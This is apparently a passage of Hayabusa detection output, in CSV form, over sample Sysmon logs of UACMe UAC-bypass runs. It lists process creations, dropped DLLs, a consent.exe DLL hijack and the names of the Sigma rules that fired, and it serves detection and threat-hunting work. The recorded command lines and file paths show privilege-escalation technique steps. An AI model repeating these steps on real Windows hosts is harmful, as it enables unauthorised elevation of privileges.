SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6000 | PGUID: 747F3D96-7933-5D45-0000-0010227E0701",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3b3 | PID: 4964 | PGUID: 747F3D96-7934-5D45-0000-0010A2A40701",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,info,,Process 
Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 7324 | PGUID: 747F3D96-7935-5D45-0000-001066CA0701,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:23.524 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 4192 | PGUID: 747F3D96-7937-5D45-0000-00100D290801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7564 | Src PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Tgt PID: 4192 | Tgt PGUID: 
747F3D96-7937-5D45-0000-00100D290801,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:25.165 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3116 | PGUID: 747F3D96-7957-5D45-0000-00100E620A01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 37 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious 
Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\GdiPlus.dll | Process: C:\Windows\explorer.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3fb | PID: 932 | PGUID: 747F3D96-7E93-5D45-0000-0010AA622601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3796 | PGUID: 747F3D96-7E93-5D45-0000-001008652601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3b3 | PID: 6576 | 
PGUID: 747F3D96-7E93-5D45-0000-0010AA8A2601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2352 | PGUID: 747F3D96-7E9E-5D45-0000-001080D92601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:27.683 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 36 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:34.577 
+09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\MSCOREE.DLL | Process: C:\Windows\explorer.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 2740 | PGUID: 747F3D96-7EE2-5D45-0000-0010E49C2801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3652 | PGUID: 747F3D96-7EE2-5D45-0000-0010F19E2801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 2348 | PGUID: 747F3D96-7EE3-5D45-0000-0010AFC12801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 7180 | PGUID: 747F3D96-7EE4-5D45-0000-001015F72801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471E00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1708 | PGUID: 747F3D96-7EE4-5D45-0000-001029F92801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 1240 | PGUID: 747F3D96-7EE4-5D45-0000-001091122901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\mmc.exe 
C:\Windows\system32\comexp.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | LID: 0x18d3b3 | PID: 7636 | PGUID: 747F3D96-7EE5-5D45-0000-001076162901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 344 | PGUID: 747F3D96-7EE5-5D45-0000-0010B71B2901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:38.640 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 796 | PGUID: 747F3D96-7EF1-5D45-0000-0010DDBF2901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:49.525 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7400 | PGUID: 747F3D96-7E25-5D45-0000-0010D0AF2301,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 22:50:26.614 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 38 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:26.782 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 398 000002806443AF40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5128 | PGUID: 747F3D96-9122-5D45-0000-001042326101,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 38 | LID: 0x18d3b3 | PID: 4372 | PGUID: 
747F3D96-9123-5D45-0000-001087596101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.101 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50105 (MSEDGEWIN10.home) | Dst: 185.199.111.153:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | LID: 0x18d3b3 | PID: 3180 | PGUID: 747F3D96-9124-5D45-0000-001022926101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | LID: 0x18d3b3 | PID: 6236 | PGUID: 747F3D96-9124-5D45-0000-00103B986101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.461 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\fubuki.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3180 | Src PGUID: 747F3D96-9124-5D45-0000-001022926101 | Tgt PID: 6236 | Tgt PGUID: 747F3D96-9124-5D45-0000-00103B986101,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 39 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\explorer.exe | PID: 4480 | PGUID: 
747F3D96-A356-5D45-0000-001029AA9901,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3fb | PID: 1492 | PGUID: 747F3D96-A356-5D45-0000-0010C5C59901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 376 0000028064463A00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7840 | PGUID: 747F3D96-A356-5D45-0000-001006D49901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3b3 | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:07.508 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\System32\mmc.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable 
